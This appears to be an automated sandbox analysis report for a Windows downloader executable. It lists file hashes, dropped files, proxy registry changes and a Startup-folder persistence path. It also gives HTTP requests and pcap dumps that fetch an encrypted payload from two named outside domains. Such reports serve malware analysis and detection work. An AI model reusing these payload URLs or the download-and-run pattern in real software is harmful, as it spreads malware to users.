Analysis Date2015-05-23 18:10:15
MD528e603d9ec6be4b215dc2d72df596101
SHA1710ec451db2a55322fab9bd1b7e1245ecdb78fcf

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: fc380bcebd472b6197d31e7cbbabc9cd sha1: c09ac786b3ecd5b96dfcb2a4d728eab02b210dbd size: 5632
Section.rdata md5: 0f858a083cde293bce96b9d1b2c5e32f sha1: e78e789fbabf5f1f69b55f086f6663963c42eb8c size: 1024
Section.data md5: f9fb3ad05a6858eb50d1715a1565800f sha1: c9b3a764a95ecb282f4a03d11bcdb94e3a168add size: 1024
Section.rsrc md5: 1ff8a510695e646dfbd20f00bb5a8bad sha1: fdabbabbabce7abd4a43d4de4c1b4970994c90f0 size: 10240
Timestamp2014-02-04 13:30:20
PEhash6ff475e7481a5100f952679965b3807a16cca2e1
IMPhash683692d4746aa100a2b6043db7fe5945

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdigitalitics.com
Winsock DNSheadstartcms.net

Network Details:

DNSheadstartcms.net
Type: A
75.98.175.85
DNSdigitalitics.com
Type: A
162.213.251.163
HTTP GEThttp://headstartcms.net/driedmango.net/image/data/banner1/10UKp.enc
User-Agent: Updates downloader
HTTP GEThttp://digitalitics.com/wp-content/uploads/2014/02/10UKp.enc
User-Agent: Updates downloader
HTTP GEThttp://headstartcms.net/driedmango.net/image/data/banner1/10UKp.enc
User-Agent: Updates downloader
HTTP GEThttp://digitalitics.com/wp-content/uploads/2014/02/10UKp.enc
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 75.98.175.85:80
Flows TCP192.168.1.1:1032 ➝ 162.213.251.163:80
Flows TCP192.168.1.1:1033 ➝ 75.98.175.85:80
Flows TCP192.168.1.1:1034 ➝ 162.213.251.163:80

Raw Pcap
0x00000000 (00000)   47455420 2f647269 65646d61 6e676f2e   GET /driedmango.
0x00000010 (00016)   6e65742f 696d6167 652f6461 74612f62   net/image/data/b
0x00000020 (00032)   616e6e65 72312f31 30554b70 2e656e63   anner1/10UKp.enc
0x00000030 (00048)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000040 (00064)   743a2074 6578742f 2a2c2061 70706c69   t: text/*, appli
0x00000050 (00080)   63617469 6f6e2f2a 0d0a5573 65722d41   cation/*..User-A
0x00000060 (00096)   67656e74 3a205570 64617465 7320646f   gent: Updates do
0x00000070 (00112)   776e6c6f 61646572 0d0a486f 73743a20   wnloader..Host: 
0x00000080 (00128)   68656164 73746172 74636d73 2e6e6574   headstartcms.net
0x00000090 (00144)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000a0 (00160)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303134 2f30322f   uploads/2014/02/
0x00000020 (00032)   3130554b 702e656e 63204854 54502f31   10UKp.enc HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 74657874   .1..Accept: text
0x00000040 (00064)   2f2a2c20 6170706c 69636174 696f6e2f   /*, application/
0x00000050 (00080)   2a0d0a55 7365722d 4167656e 743a2055   *..User-Agent: U
0x00000060 (00096)   70646174 65732064 6f776e6c 6f616465   pdates downloade
0x00000070 (00112)   720d0a48 6f73743a 20646967 6974616c   r..Host: digital
0x00000080 (00128)   69746963 732e636f 6d0d0a43 61636865   itics.com..Cache
0x00000090 (00144)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000a0 (00160)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f647269 65646d61 6e676f2e   GET /driedmango.
0x00000010 (00016)   6e65742f 696d6167 652f6461 74612f62   net/image/data/b
0x00000020 (00032)   616e6e65 72312f31 30554b70 2e656e63   anner1/10UKp.enc
0x00000030 (00048)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000040 (00064)   743a2074 6578742f 2a2c2061 70706c69   t: text/*, appli
0x00000050 (00080)   63617469 6f6e2f2a 0d0a5573 65722d41   cation/*..User-A
0x00000060 (00096)   67656e74 3a205570 64617465 7320646f   gent: Updates do
0x00000070 (00112)   776e6c6f 61646572 0d0a486f 73743a20   wnloader..Host: 
0x00000080 (00128)   68656164 73746172 74636d73 2e6e6574   headstartcms.net
0x00000090 (00144)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000a0 (00160)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303134 2f30322f   uploads/2014/02/
0x00000020 (00032)   3130554b 702e656e 63204854 54502f31   10UKp.enc HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 74657874   .1..Accept: text
0x00000040 (00064)   2f2a2c20 6170706c 69636174 696f6e2f   /*, application/
0x00000050 (00080)   2a0d0a55 7365722d 4167656e 743a2055   *..User-Agent: U
0x00000060 (00096)   70646174 65732064 6f776e6c 6f616465   pdates downloade
0x00000070 (00112)   720d0a48 6f73743a 20646967 6974616c   r..Host: digital
0x00000080 (00128)   69746963 732e636f 6d0d0a43 61636865   itics.com..Cache
0x00000090 (00144)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000a0 (00160)   68650d0a 0d0a                         he....


Strings
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\w4760swjD.exe
Dial1
MS Sans Serif
Push to exit
/97B+Q
AWVAf9
CloseHandle
COMCTL32.dll
CreateFileW
@.data
DialogBoxIndirectParamW
EndDialog
GetDlgItem
GetFileSize
GetModuleHandleA
GetProcessHeap
G)NSW2Y
HeapAlloc
HeapFree
iRichu
KERNEL32.dll
KXG[O_
lstrcpyW
`.rdata
ReadFile
SendMessageW
!This program cannot be run in DOS mode.
USER32.dll
wsprintfW